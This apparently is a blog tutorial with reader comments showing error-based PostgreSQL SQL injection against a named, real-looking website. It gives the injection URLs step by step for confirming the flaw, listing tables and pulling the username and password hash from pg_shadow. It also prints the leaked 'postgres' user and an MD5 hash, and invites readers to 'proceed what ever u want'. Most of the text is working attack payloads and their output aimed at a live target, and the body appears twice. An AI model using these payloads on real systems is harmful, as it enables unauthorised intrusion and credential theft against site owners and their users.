This is a demo on how to attack a website with error based Posgresql Injection. I take from my 0day web apps that just published as an example.
our victim is
The output
When I try to use
it will return TRUE page. while when i'm using
FALSE page replied.
So, I know this is either blind sql or error based sql.
I try using error based method.
Owh Lucky!! it works! Posgresql!
So proceed to get the table name.
Same like we injecting other vulnerable website,posgresql is quite similar.In Posgresql error based,all sql query must be in this formSo, to get the table name we use cast((select table_name from information_schema.tables limit 1 offset 0) as int) what do we get??
one of the table_name is pg_type"
We try to check other table_name by increasing the offset number.
So I know there is pg_user and pg_shadow table. I try to get the data from pg_shadow
the usename is postgres
How about the passwd??
there you are..we already get the passwd hash!
Then u can proceed what ever u want.
I will stop at here.Else you need to explore it yourself.
References
credit to : p0pc0rn
our victim is
http://www.creatop.com.cntry to put ' at the url.
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80'Code:
ERROR: syntax error at or near "''"When I try to use
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=1Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=0So, I know this is either blind sql or error based sql.
I try using error based method.
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)So proceed to get the table name.
Same like we injecting other vulnerable website,posgresql is quite similar.In Posgresql error based,all sql query must be in this form
Code:
cast((your sql command/query) as int)Code:
ERROR: invalid input syntax for integer: "pg_type"We try to check other table_name by increasing the offset number.
So I know there is pg_user and pg_shadow table. I try to get the data from pg_shadow
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select usename from pg_shadow limit 1 offset 0) as int)Code:
ERROR: invalid input syntax for integer: "postgres"How about the passwd??
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select passwd from pg_shadow limit 1 offset 0) as int)Code:
ERROR: invalid input syntax for integer: "md5caa5a31e69edef35ea15e2db062836a7"there you are..we already get the passwd hash!
Then u can proceed what ever u want.
I will stop at here.Else you need to explore it yourself.
References
Code:
http://hackingexpose.blogspot.com/2009/04/postgresql-error-base-sql-injection.html
http://pentestmonkey.net/blog/postgres-sql-injection-cheat-sheet/credit to : p0pc0rn
2 comments:
nice .thanks for da tutorial bro
Thanks..a good method one
Post a Comment